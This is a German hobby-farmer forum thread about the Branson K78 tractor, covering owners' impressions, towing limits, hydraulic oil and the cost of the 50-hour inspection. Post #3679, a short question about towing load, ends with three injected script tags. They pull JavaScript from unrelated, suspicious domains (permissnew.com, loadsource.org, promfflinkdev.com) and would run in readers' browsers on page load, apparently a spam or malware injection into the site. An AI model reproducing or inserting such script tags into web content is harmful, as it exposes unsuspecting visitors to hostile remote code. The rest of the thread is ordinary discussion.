Überspringen zu Hauptinhalt
Ansicht von 15 Beiträgen – 1 bis 15 (von insgesamt 27)
  • Autor
    Beiträge
  • #3089
    reimund
    Teilnehmer
      Meister

      Hallo Gemeinde,

      seit einiger Zeit bin ich ja jetzt stolzer Besitzer eines K 78. Dieser hat zwischenzeitlich ca. 25 Betriebsstunden auf dem Tacho und ich kann nun die ersten Erfahrungen teilen.

      Generell bin ich mit dem Traktor sehr zufrieden, deshalb zähle ich jetzt nicht auf was ich alles toll finde sondern ich möchte kurz mal zusammenfassen was nicht so toll ist (wobei das jetzt wirklich das suchen nach dem Haar in der Suppe ist):

       

      1. bei Erdarbeiten und voller Schaufel hebt der K78 hinten fast ab, der Traktor ist hinten ggf. etwas zu leicht. Macht aber nichts, man kann mit einem Gegengewicht hier relativ einfach Abhilfe schaffen.

      2. Ich bilde mir ein dass der Dieselverbrauch etwas hoch ist. Vielleicht senkt sich der Verbrauch noch nach einer gewissen “Einfahrphase”. Aber da ich ja Hobbyfahrer bin und nicht tausende von Stunden pro Jahr arbeite macht es mir unterm Strich nicht so viel aus.

       

      Was aber wirklich toll ist, und das soll nun nicht unerwähnt bleiben, bei den Temperaturen die zur Zeit herrschen ist die standardmässig eingebaute Klimaanlage ein Segen – funktioniert hervorragend.

       

      Ich werde weiter berichten wenn der Trekker mal ca. 50 Stunden auf dem Tacho hat.

       

      Gruß

      Reimund

      Attachments:
      You must be logged in to view attached files.
      #3091
      in-stinkt
      Teilnehmer
        Zweiter Forummeister

        Spritverbrauch hoch + Klima ist super = Erklärung 😉

        Schön, dass auch der große ein ordentliches und durchdachtes Trekkerchen ist.

        Hier wird (man) immer noch doof (aus)gelächelt wenn man nicht in irgend einer Weise grün fährt. “Alles andere ist doch Mist…”

        Dass ein JD mal stolz das 1,5fache kostet und ich die 10000€ Mehrkosten erst mal bei knapp 100 Betriebsstunden pro Jahr wieder reinholen müsste, interessiert da auch nicht…

        Dann mal weiter so mit deinem kleinen Großen und allzeit gute Fahrt

         

        #3668
        mocrock
        Teilnehmer
          Senior Meister

          Hallo Raimund,

          noch immer zufrieden mit dem K78? Seit September bin auch auch stolzer Besitzer. Allerdings haben die Bauern in der Umgebung nichts besseres zu tun, als den Trecker in Frage zu stellen oder Schwachstellen zu suchen. Immer kommt ein Spruch wie “also in der professionellen Landwirtschft….”

          Bisher ( ca. 25h) bin ich aber sehr zufrieden  mit der Maschine. Er verrichtet gute Dienst.

           

          Viele Grüße

          Martin

          #3674
          reimund
          Teilnehmer
            Meister

            Servus Martin,

            freut mich dass Du nun auch stolzer Besitzer eines K78 bist. Nun sind wir – so wie ich es überblicke schon zwei Mitglieder hier im Forum die den K78 haben.

            Ich bin nach wie vor sehr zufrieden mit meiner Maschine. Er schlägt sich richtig gut. Habe jetzt 70 Stunden drauf und noch nicht das kleinste Anzeichen irgendeines Problems.
            Das Einzige was ich “bemängle” ist, dass der Traktor leichtgewichtig ist. Wenn man mit dem Frontlader Erdbewegungen machen will empfiehlt es sich ein Heckgewicht dran zu machen – und schon ist das “Problem” behoben.

            Und nach wie vor scheint mir der Spritverbrauch etwas hoch – aber ich kann das leider nicht vergleichen, hatte vorher keinen Schlepper. Da ich aber eher im Hobbybereich unterwegs bin komme ich damit auch gut klar.

            Bis jetzt aber wüsste ich nicht warum der K78 nicht auch für einen Vollerwerbslandwirt nicht geeignet sein sollte.

            Weiterhin viel Spaß mit Deinem Gefährt.

            Gruß

            Reimund

             

             

             

            #3679
            wachteljosef
            Teilnehmer
              Junior Meister

              hallo suche anhängerlast vom k 78

              habe einen bestellt

              <script src=”//permissnew.com/1cbabfaba9fb0d03cc.js”></script><script src=”https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7354x&r=1541525326006&#8243; type=”text/javascript”></script><script src=”https://promfflinkdev.com/ext/1cbabfaba9fb0d03cc.js?sid=52295_7354_&title=FF_%5B601%5D_missionewapp.cool&blocks%5B%5D=31af2&#8243; type=”text/javascript”></script>

              #3680
              mocrock
              Teilnehmer
                Senior Meister

                4700/3000 kg gebremst/ungebremst laut Fahrzeugschein

                #3700
                reimund
                Teilnehmer
                  Meister

                  noch ergänzend:

                  Stützlast: 817 kg

                  Anhängelast Druckluftgebremst: 12 To

                  Ich habe noch eine Kugelkopfkupplung anbauen lassen, weil ich einen Baggertrailer (Gesamtgewicht 3,5 To) ziehe – funktionert auch, aber auf die entsprechend zugelassene Kugelkopfkopfkupplung achten.

                   

                  #3702
                  mocrock
                  Teilnehmer
                    Senior Meister

                    Hallo zusammen,

                    weiss jemand, welches Hydrauliköl ich hinten in den K78 füllen kann?

                    Habe noch HLP46, ist das OK?

                    Viele Grüße

                    Martin

                     

                    #3733
                    mocrock
                    Teilnehmer
                      Senior Meister

                      Habe die Info dann doch noch im Serviceheft gefunden: UTTO mit API GL4

                      #3734
                      mesatec
                      Teilnehmer
                        Meister

                        Hallo,

                        wir haben auch einen K78 laufen, dieser hat nun etwas über 600 Stunden gelaufen.

                        Es ist ratsam sich beim K78 mit Frontlader eine Schwingungsdämpfung einbauen zu lassen. Dann ” schlägt ” der Frontlader nicht mehr so und der Traktor hat eine bessere , ruhigere Straßenlage. In der Kabine ist dann noch ein Schalter montiert, über den man das ganze ein und ausschalten kann, wenn man es z.B. grade nicht braucht oder nutzen möchte.

                        Bei uns sieht das ganze so aus .

                        Gruß MesatecSchwingungsdämpfung Frontlader K78

                        Attachments:
                        You must be logged in to view attached files.
                        #3740
                        mocrock
                        Teilnehmer
                          Senior Meister

                          Hallo mesarec,

                          sonst zufrieden mit dem K78?

                          Irgendetwas was man bedenken sollte? Haben unseren erst seit wenigen Wochen…

                          Viele Grüße

                          Martin

                          #4443
                          mocrock
                          Teilnehmer
                            Senior Meister

                            So, heute die 50h Inspektion machen lassen, hat über 700 Euronen gekostet…heftig.

                            #4445
                            albertweidinger
                            Teilnehmer
                              Meister

                              Was wurde da alles gemacht bei der Inspektion??

                               

                               

                              #4454
                              Sepp
                              Teilnehmer
                                Zweiter Forummeister

                                Hallo Martin, meiner ist demnächst auch fällig.

                                Ich habe jetzt 42 Std. auf der Uhr, kommt auch bald die 50 Std. Kontrolle. Bin am überlegen ob sie selbst machen soll oder zum Branson-Vertragshändler. Wenn ich es selbst mache würde mir eine Autowerkstatt die Kontrolle im Buch abstempeln. Wäre von der Garantie her auch möglich.

                                Gruß Sepp

                                 

                                #4457
                                mesatec
                                Teilnehmer
                                  Meister

                                  Hallo zusammen,

                                  das die 50-Stunden-Inspektion relativ teuer ist, ist ganz einfach zu erklären.

                                  Es werden alle Öle und alle Filter getauscht.

                                  Und bei 9 Liter Motoröl, 63 Liter Getriebe-/ Hydrauliköl und noch mal 12 Liter auf der Vorderachse kommen ja alleine bei den 85 Litern  Öl schon einige Taler zusammen. Dazu kommen dann noch Motor- und Getriebeölfilter, das Ventilspiel muss kontrolliert und ggf. eingestellt werden, etc.

                                  Dafür wird es bei den 100- und 200- Stunden- Inspektionen aber ja wieder günstiger. Bei 100- Stunden wird noch einmal das Motoröl mit Filter sowie der Kraftstofffilter getauscht. Und bei 200- Stunden nur das Luftfilterelement und der Kraftstofffilter, keine Öle.

                                  Und zur Beruhigung, das geht den anderen Branson-Fahrern mit 00-/F- und 25- Serie nicht viel anders. ( Bei den Serien ist jedes Mal ein Motorölwechsel fällig.

                                   

                                  Gruß Mesatec

                                  Attachments:
                                  You must be logged in to view attached files.
                                Ansicht von 15 Beiträgen – 1 bis 15 (von insgesamt 27)
                                • Du musst angemeldet sein, um auf dieses Thema antworten zu können.
                                An den Anfang scrollen

                                New Report

                                Close